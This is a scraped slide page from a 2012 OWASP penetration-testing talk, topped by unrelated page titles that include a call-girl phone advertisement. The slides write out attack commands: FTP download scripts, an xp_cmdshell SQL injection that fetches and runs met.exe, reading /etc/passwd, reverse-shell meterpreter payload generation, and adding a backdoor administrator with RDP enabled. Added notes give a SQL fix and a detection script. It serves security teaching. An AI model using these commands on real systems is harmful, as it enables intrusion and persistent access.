From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 

Public exploit held private : Penetration Testing the researcher’s way

  • 1. OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 2. DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
  • 3. Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
  • 4. Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
  • 5. Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
  • 6. Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
  • 7. Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
  • 8. Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
  • 9. Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
  • 10. Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
  • 11. Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 12. Nmap Scripts /usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
  • 13. Nmap Scripts • Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129 • Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129 • Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
  • 14. Scanning I have Nessus. Why to go through so much pain? I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
15. Exploit

Motive
  To gain access
  Data
  Command execution
  Destroy everything!
Categories
  Service level
  OS
16. Exploit

What to exploit?
  FTP?
  HTTP?
  SNMP?
  What else?
17. Exploit

FTP
  Server exploit – buffer overflow
  Fuzzing???
  Bruteforce
SNMP
  What to do?
18. FTP Tips

Windows (builds an FTP command script and runs it non-interactively; the two "ftp" lines are the anonymous username and password):
  echo open 192.168.12.124 > ftp.txt
  echo ftp>> ftp.txt
  echo ftp>> ftp.txt
  echo bin >> ftp.txt
  echo get met2.exe >> ftp.txt
  echo bye >> ftp.txt
  ftp -s:ftp.txt
19. FTP Tips

Linux (same idea; "quote user"/"quote pass" log in explicitly because ftp -n disables auto-login):
  echo quote user ftp > ftp.txt
  echo quote pass ftp >> ftp.txt
  echo verbose >> ftp.txt
  echo binary >> ftp.txt
  echo get exploit.c >> ftp.txt
  echo bye >> ftp.txt
  cat ftp.txt | ftp -n 192.168.12.124
20. Exploit

HTTP
  Server exploit
  Command execution
  Web shells
  SQLi
21. HTTP
22. SQLi Tips

MS SQL stacked-query injection, as a single injection string: the first clause makes the WHERE condition true and each following statement calls xp_cmdshell to write an FTP script, fetch met.exe and run it (xp_cmdshell is disabled by default since SQL Server 2005, so this also depends on the server's configuration):
  ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye>> ftpmet.txt';exec master..xp_cmdshell 'ftp -s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';--
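Why the payload on this slide works, and the fix, as an added example that is not from the slides: the vulnerable lookup concatenates user input into the SQL text, the hardened one binds it as a parameter. It uses an in-memory SQLite table (constructed) and a shortened form of the slide's string; SQLite happens to refuse stacked statements, which SQL Server does not, so parameterisation rather than the database's behaviour is the control.

```python
import sqlite3

def make_db():
    """Constructed in-memory user table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "admin"), ("bob", "user")])
    return conn

def find_user_vulnerable(conn, name):
    """Vulnerable: the input is pasted into the SQL text, so quotes and ';' become syntax."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, name):
    """Hardened: a bound parameter is sent as data; the same input stays a plain string."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()

# The opening clause of the slide's payload, and a shortened stacked-query form of it.
BYPASS = "' or 1=1--"
STACKED = "' or 1=1;exec master..xp_cmdshell 'ftp -s:ftpmet.txt';--"

def demo():
    conn = make_db()
    out = {
        "vuln_bypass": find_user_vulnerable(conn, BYPASS),   # WHERE is always true: every row
        "safe_bypass": find_user_safe(conn, BYPASS),         # no user with that literal name: []
        "safe_stacked": find_user_safe(conn, STACKED),       # still just a string: []
    }
    try:
        out["vuln_stacked"] = find_user_vulnerable(conn, STACKED)
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # SQLite refuses a second statement; SQL Server would execute the xp_cmdshell call.
        out["vuln_stacked"] = "rejected: " + str(exc)
    return out

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```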
23. SQLi Tips

MySQL non-interactive (-e runs the statement and exits; LOAD_FILE needs the FILE privilege and is limited by secure_file_priv):
  mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
  mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';"
24. Exploit

Metasploit
  use <exploit>
  set payload
  exploit
Any other options? How about writing your own exploit (in your free time)? (out of scope)
25. L33t love story

Exploit's love letter to the machine
  PAYLOAD… Which courier?
    MSF – set payload
    Custom program – msfpayload
    Bad characters
    Executable – msfpayload
26. Payload Generator

meterpreter msfpayload options (O = list options, X = Windows executable, C = shellcode as a C array):
  ./msfpayload windows/meterpreter/reverse_tcp O
Create exe:
  ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
Generate shellcode:
  ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C
(msfpayload has since been retired; msfvenom provides the same functions in current Metasploit releases)
27. From msf:

  use exploit/multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.1.40
  set LPORT 80
  show options
  exploit
28. Exploit

I am in, what to do?
  Secure access?
  Add user
  Open a port
  I like it the reverse way
  meterpreter
Dude, did you get root/admin access?
29. Add User

Windows shell
  net user hacker hacker123 /add
  net localgroup administrators hacker /add
Meterpreter
  use incognito
  add_user hacker hacker123
  add_localgroup_user Administrators hacker
RDP enable
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
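What the sequence on this slide looks like from the blue-team side, as an added example not taken from the slides: correlate a Windows Security event 4720 (user account created) with a 4732 (member added to a security-enabled local group) for the same account within a short window. The CSV export format, column names and event rows are constructed for this example.

```python
import csv
from datetime import datetime, timedelta
from io import StringIO

# Constructed export of Windows Security log events (not real data). Column names are an
# assumption of this example. Real 4732 events identify the member by SID rather than by
# name, so resolve the SID to an account name before feeding rows in.
SAMPLE_EVENTS = """\
time,event_id,subject_user,target_user,group
2012-08-24 10:15:02,4720,SRV1\\svc_backup,hacker,
2012-08-24 10:15:03,4732,SRV1\\svc_backup,hacker,Administrators
2012-08-24 11:40:10,4720,SRV1\\helpdesk,jsmith,
2012-08-24 11:41:00,4732,SRV1\\helpdesk,jsmith,Remote Desktop Users
2012-08-25 09:00:00,4732,SRV1\\helpdesk,jsmith,Administrators
"""

def find_quick_admin_creations(csv_text, window_seconds=300):
    """Return (account, created_by, seconds_between) for each account that was created
    (4720) and then added to the local Administrators group (4732) within window_seconds."""
    created = {}  # account -> (creation time, principal that created it)
    hits = []
    for row in csv.DictReader(StringIO(csv_text)):
        ts = datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S")
        account = row["target_user"].lower()
        if row["event_id"] == "4720":
            created[account] = (ts, row["subject_user"])
        elif row["event_id"] == "4732" and row["group"].lower() == "administrators":
            if account in created:
                c_ts, creator = created[account]
                gap = ts - c_ts
                if timedelta(0) <= gap <= timedelta(seconds=window_seconds):
                    hits.append((account, creator, int(gap.total_seconds())))
    return hits

if __name__ == "__main__":
    print(find_quick_admin_creations(SAMPLE_EVENTS))  # [('hacker', 'SRV1\\svc_backup', 1)]
```

The registry change that enables RDP leaves no event unless object access auditing is configured on that key, so it is best caught by a configuration baseline check rather than by log correlation.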
30. Privilege Escalation

Categories
  Service level
  OS
Problem!
  How can I transfer my exploit there?
    Netcat
    FTP
31. Kernel Exploits

  Linux Kernel <= 2.6.36-rc8                         http://www.exploit-db.com/exploits/15285/
  Linux Kernel 2.4/2.6                               http://www.exploit-db.com/exploits/9545/
  Linux Kernel 2.6                                   http://www.exploit-db.com/exploits/8478/
  Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5     http://www.exploit-db.com/exploits/9844/
32. Windows Exploits

  Windows Vista, 7, 2008       http://www.exploit-db.com/exploits/15609/
  Windows XP, 2003             http://www.exploit-db.com/exploits/18176/
  Linux + NT priv esc          http://www.exploit-db.com/exploits/9301/
  Windows XP SP2, SP3          http://www.exploit-db.com/exploits/9301/
33. Pivoting…

Huh? Why do I need it? How do I do it?
  nc + port forwarding
  SSH tunneling
34. Fuzzing…

My favourite, but the last thing I prefer to do on my own
Python rocks!
  Basic
  Advanced
  SEH handler
  Egg hunting shellcode
35. Did I miss anything?

Questions
Perspectives
Comments

tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
36. Thank you

tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu